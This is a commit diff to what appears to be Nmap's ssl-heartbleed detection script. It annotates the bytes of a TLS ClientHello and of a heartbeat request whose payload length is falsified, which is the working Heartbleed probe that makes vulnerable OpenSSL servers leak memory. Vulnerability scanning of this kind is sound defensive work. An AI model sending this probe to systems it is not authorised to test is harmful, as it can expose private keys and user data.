Expand the binary blobs in ssl-hearbleed to allow tweaking

2025-12-16 20:59:02 +00:00 · 2014-04-09 14:37:35 +00:00
parent 9b93706cf3
commit cd0ed4ff7f
1 changed files with 92 additions and 16 deletions
--- a/scripts/ssl-heartbleed.nse
+++ b/scripts/ssl-heartbleed.nse
@@ -32,6 +32,7 @@ local shortport = require('shortport')
 local sslcert = require('sslcert')
 local stdnse = require('stdnse')
 local string = require('string')
 local table = require('table')
 local vulns = require('vulns')
 author = "Patrik Karlsson <patrik@cqure.net>"
@@ -74,23 +75,98 @@ OpenSSL versions 1.0.1 and 1.0.2-beta releases (including 1.0.1f and 1.0.2-beta1
    }
  }
-  local hello = bin.pack('H', [[16 03 02 00  dc 01 00 00 d8 03 02 53
+  local hello = bin.pack('H', table.concat(
-    43 5b 90 9d 9b 72 0b bc  0c bc 2b 92 a8 48 97 cf
+      {
-    bd 39 04 cc 16 0a 85 03  90 9f 77 04 33 d4 de 00
+        "16", --handshake ContentType
-    00 66 c0 14 c0 0a c0 22  c0 21 00 39 00 38 00 88
+        "03 02", -- TLSv1.1
-    00 87 c0 0f c0 05 00 35  00 84 c0 12 c0 08 c0 1c
+        "00 dc", -- record length
-    c0 1b 00 16 00 13 c0 0d  c0 03 00 0a c0 13 c0 09
+        "01", -- handshake type ClientHello
-    c0 1f c0 1e 00 33 00 32  00 9a 00 99 00 45 00 44
+        "00 00 d8", -- body length
-    c0 0e c0 04 00 2f 00 96  00 41 c0 11 c0 07 c0 0c
+        "03 02", -- TLSv1.1
-    c0 02 00 05 00 04 00 15  00 12 00 09 00 14 00 11
+        "53 43 5b 90", -- date/time (Tue Apr  8 02:14:40 2014)
-    00 08 00 06 00 03 00 ff  01 00 00 49 00 0b 00 04
+        "9d9b720bbc0cbc2b92a84897cfbd3904cc160a8503909f770433d4de", -- random
-    03 00 01 02 00 0a 00 34  00 32 00 0e 00 0d 00 19
+        "00", -- session ID
-    00 0b 00 0c 00 18 00 09  00 0a 00 16 00 17 00 08
+        "00 66", -- cipher suites length (102 = 51 suites)
-    00 06 00 07 00 14 00 15  00 04 00 05 00 12 00 13
+        "c0 14", -- TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA
-    00 01 00 02 00 03 00 0f  00 10 00 11 00 23 00 00
+        "c0 0a", -- TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA
-    00 0f 00 01 01]])
+        "c0 22", -- TLS_SRP_SHA_DSS_WITH_AES_256_CBC_SHA
        "c0 21", -- TLS_SRP_SHA_RSA_WITH_AES_256_CBC_SHA
        "00 39", -- TLS_DHE_RSA_WITH_AES_256_CBC_SHA
        "00 38", -- TLS_DHE_DSS_WITH_AES_256_CBC_SHA
        "00 88", -- TLS_DHE_RSA_WITH_CAMELLIA_256_CBC_SHA
        "00 87", -- TLS_DHE_DSS_WITH_CAMELLIA_256_CBC_SHA
        "c0 0f", -- TLS_ECDH_RSA_WITH_AES_256_CBC_SHA
        "c0 05", -- TLS_ECDH_ECDSA_WITH_AES_256_CBC_SHA
        "00 35", -- TLS_RSA_WITH_AES_256_CBC_SHA
        "00 84", -- TLS_RSA_WITH_CAMELLIA_256_CBC_SHA
        "c0 12", -- TLS_ECDHE_RSA_WITH_3DES_EDE_CBC_SHA
        "c0 08", -- TLS_ECDHE_ECDSA_WITH_3DES_EDE_CBC_SHA
        "c0 1c", -- TLS_SRP_SHA_DSS_WITH_3DES_EDE_CBC_SHA
        "c0 1b", -- TLS_SRP_SHA_RSA_WITH_3DES_EDE_CBC_SHA
        "00 16", -- TLS_DHE_RSA_WITH_3DES_EDE_CBC_SHA
        "00 13", -- TLS_DHE_DSS_WITH_3DES_EDE_CBC_SHA
        "c0 0d", -- TLS_ECDH_RSA_WITH_3DES_EDE_CBC_SHA
        "c0 03", -- TLS_ECDH_ECDSA_WITH_3DES_EDE_CBC_SHA
        "00 0a", -- TLS_RSA_WITH_3DES_EDE_CBC_SHA
        "c0 13", -- TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA
        "c0 09", -- TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA
        "c0 1f", -- TLS_SRP_SHA_DSS_WITH_AES_128_CBC_SHA
        "c0 1e", -- TLS_SRP_SHA_RSA_WITH_AES_128_CBC_SHA
        "00 33", -- TLS_DHE_RSA_WITH_AES_128_CBC_SHA
        "00 32", -- TLS_DHE_DSS_WITH_AES_128_CBC_SHA
        "00 9a", -- TLS_DHE_RSA_WITH_SEED_CBC_SHA
        "00 99", -- TLS_DHE_DSS_WITH_SEED_CBC_SHA
        "00 45", -- TLS_DHE_RSA_WITH_CAMELLIA_128_CBC_SHA
        "00 44", -- TLS_DHE_DSS_WITH_CAMELLIA_128_CBC_SHA
        "c0 0e", -- TLS_ECDH_RSA_WITH_AES_128_CBC_SHA
        "c0 04", -- TLS_ECDH_ECDSA_WITH_AES_128_CBC_SHA
        "00 2f", -- TLS_RSA_WITH_AES_128_CBC_SHA
        "00 96", -- TLS_RSA_WITH_SEED_CBC_SHA
        "00 41", -- TLS_RSA_WITH_CAMELLIA_128_CBC_SHA
        "c0 11", -- TLS_ECDHE_RSA_WITH_RC4_128_SHA
        "c0 07", -- TLS_ECDHE_ECDSA_WITH_RC4_128_SHA
        "c0 0c", -- TLS_ECDH_RSA_WITH_RC4_128_SHA
        "c0 02", -- TLS_ECDH_ECDSA_WITH_RC4_128_SHA
        "00 05", -- TLS_RSA_WITH_RC4_128_SHA
        "00 04", -- TLS_RSA_WITH_RC4_128_MD5
        "00 15", -- TLS_DHE_RSA_WITH_DES_CBC_SHA
        "00 12", -- TLS_DHE_DSS_WITH_DES_CBC_SHA
        "00 09", -- TLS_RSA_WITH_DES_CBC_SHA
        "00 14", -- TLS_DHE_RSA_EXPORT_WITH_DES40_CBC_SHA
        "00 11", -- TLS_DHE_DSS_EXPORT_WITH_DES40_CBC_SHA
        "00 08", -- TLS_RSA_EXPORT_WITH_DES40_CBC_SHA
        "00 06", -- TLS_RSA_EXPORT_WITH_RC2_CBC_40_MD5
        "00 03", -- TLS_RSA_EXPORT_WITH_RC4_40_MD5
        "00 ff", -- TLS_EMPTY_RENEGOTIATION_INFO_SCSV (RFC 5746)
        "01", -- compressors length
        "00", -- NULL compressor
        "00 49", -- extensions length
        "00 0b", -- ec_point_formats
        "00 04", -- ec_point_formats length
        "03", -- point formats length
        "00", -- ec_point_formats uncompressed
        "01", -- ec_point_formats ansiX962_compressed_prime
        "02", -- ec_point_formats ansiX962_compressed_char2
        "00 0a", -- elliptic_curves
        "00 34", -- elliptic_curves length
        "00 32", -- elliptic curves length
        "00 0e 00 0d 00 19 00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08 00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13 00 01 00 02 00 03 00 0f 00 10 00 11", -- elliptic_curves data (all curves)
        "00 23", -- SessionTicket TLS
        "00 00", -- SessionTicket length
        "00 0f", -- heartbeat
        "00 01", -- heartbeat length
        "01", -- heartbeat data: peer_allowed_to_send
      })
    )
-  local hb = bin.pack('H', '18 03 02 00 03 01 40 00')
+  local hb = bin.pack('H', table.concat({
        "18", -- Heartbeat ContentType
        "03 02", -- TLSv1.1
        "00 03", -- record length
        "01", -- HeartbeatType HeartbeatRequest
        "40 00", -- payload length (falsified)
      })
    )
  local report = vulns.Report:new(SCRIPT_NAME, host, port)
  local s = nmap.new_socket()